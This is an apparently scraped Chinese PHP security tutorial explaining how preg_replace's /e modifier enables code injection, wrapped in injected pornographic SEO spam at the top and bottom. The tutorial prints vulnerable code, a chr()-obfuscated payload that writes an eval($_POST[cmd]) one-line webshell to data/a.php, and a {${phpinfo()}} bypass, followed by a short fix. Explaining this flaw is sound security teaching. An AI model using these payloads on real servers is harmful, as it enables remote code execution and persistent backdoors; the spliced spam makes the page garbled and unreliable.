mixed preg_replace ( mixed pattern, mixed replacement, mixed subject [, int limit])

特別說明: /e 修正符使 preg_replace() 將 replacement 參數(shù)當作 PHP 代碼(在適當?shù)哪嫦蛞锰鎿Q完 " /> 国产内射AV徐夜夜,暖暖视频免费高清在线观看 视频,欧美色图14p

天天躁日日躁狠狠躁AV麻豆-天天躁人人躁人人躁狂躁-天天澡夜夜澡人人澡-天天影视香色欲综合网-国产成人女人在线视频观看-国产成人女人视频在线观看

慎用preg_replace危險的/e修飾符(一句話后門常用)

preg_replace函數(shù)原型:

mixed preg_replace ( mixed pattern, mixed replacement, mixed subject [, int limit])

特別說明:
/e 修正符使 preg_replace() 將 replacement 參數(shù)當作 php 代碼(在適當?shù)哪嫦蛞锰鎿Q完之后)。提示:要確保 replacement 構(gòu)成一個合法的 php 代碼字符串,否則 php 會在報告在包含 preg_replace() 的行中出現(xiàn)語法解析錯誤。
舉例:

復制代碼 代碼如下:
<?php
preg_replace ("/(</?)(w+)([^>]*>)/e",
"/1.strtoupper(/2)./3",
$html_body);
?>


這將使輸入字符串中的所有 HTML 標記變成大寫。

安全威脅分析:
通常subject參數(shù)是由客戶端產(chǎn)生的,客戶端可能會構(gòu)造惡意的代碼,例如:

復制代碼 代碼如下:
<?
echo preg_replace("/test/e",$_GET["h"],"jutst test");
?>


如果我們提交?h=phpinfo(),phpinfo()將會被執(zhí)行(使用/e修飾符,preg_replace會將 replacement 參數(shù)當作 php 代碼執(zhí)行)。
如果我們提交下面的代碼會怎么樣呢?
?h=eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(100).chr(97).
chr(116).chr(97).chr(47).chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).
chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).
chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59))
密文對應的明文是:fputs(fopen(data/a.php,w),<?php eval($_POST[cmd])?>);
執(zhí)行的結(jié)果是在/data/目錄下生成一個一句話木馬文件 a.php

再來一個有難度的例子:

復制代碼 代碼如下:
<?
function test($str)
{
}
echo preg_replace("/s*[php](.+?)[/php]s*/ies", 'test("/1")', $_GET["h"]);
?>


提交 ?h=[php]phpinfo()[/php],phpinfo()會被執(zhí)行嗎?
肯定不會。因為經(jīng)過正則匹配后, replacement 參數(shù)變?yōu)?test("phpinfo")',此時phpinfo僅是被當做一個字符串參數(shù)了。
有沒有辦法讓它執(zhí)行呢?


當然有。在這里我們?nèi)绻峤?h=[php]{${phpinfo()}}[/php],phpinfo()就會被執(zhí)行。為什么呢?
php中,雙引號里面如果包含有變量,php解釋器會將其替換為變量解釋后的結(jié)果;單引號中的變量不會被處理。
注意:雙引號中的函數(shù)不會被執(zhí)行和替換。

在這里我們需要通過{${}}構(gòu)造出了一個特殊的變量,'test("{${phpinfo()}}")',達到讓函數(shù)被執(zhí)行的效果(${phpinfo()}會被解釋執(zhí)行)。
可以先做如下測試:

復制代碼 代碼如下:
echo "{${phpinfo()}}";


phpinfo會被成功執(zhí)行了。

如何防范這種漏洞呢?
將'test("/1")' 修改為"test('/1')",這樣‘${phpinfo()}'就會被當做一個普通的字符串處理(單引號中的變量不會被處理)。

php技術(shù)慎用preg_replace危險的/e修飾符(一句話后門常用),轉(zhuǎn)載需保留來源!

鄭重聲明:本文版權(quán)歸原作者所有,轉(zhuǎn)載文章僅為傳播更多信息之目的,如作者信息標記有誤,請第一時間聯(lián)系我們修改或刪除,多謝。

主站蜘蛛池模板: 久久是热这里只有精品 | 伊人久久综合影院 | 美女打开双腿扒开屁股男生 | 美女撒尿无遮挡免费中国 | SM调教贱屁股眼哭叫求饶H | 国产午夜精品美女免费大片 | 国产精品第八页 | 亚洲色欲国产AV精品综合 | 欧美一区二区三区激情视频 | 午夜影视不用充钱的免费 | 久久精品视频免费 | 久久这里只有精品国产精品99 | 狠日狠干日曰射 | 国精产品一区二区三区有限公司 | 国产激情视频在线观看 | beeg日本高清xxxx | 九色PORNY蝌蚪视频首页 | 伊人精品影院 | 午夜AV内射一区二区三区红桃视 | xxxx老妇性hdbbbb | 国产成人无码精品久久久按摩 | 国内精品久久久久影院网站 | 果冻传媒在线观看视频 | 国产在线精品亚洲视频在线 | 老阿姨才是最有V味的直播 牢记永久免费网址 | 狠狠色狠狠色综合日日小说 | 后入式啪gif动态图 后入式狂顶免费视频 | 娇女的呻吟亲女禁忌h16 | 日本妈妈xxxx| 野花社区视频WWW高清 | 秋霞特色大片18岁入口 | 国产午夜精品理论片免费观看 | 久久婷五月综合色啪首页 | 亚洲欧美中文日韩v在线 | 伊人久久99热这里只有精品 | 99视频精品全部免费观看 | 成人毛片18岁女人毛片免费看 | 多肉np一女多男高h爽文现代 | 国产婷婷一区二区在线观看 | 久久精品熟一区二区三区 | 欧美重口绿帽video |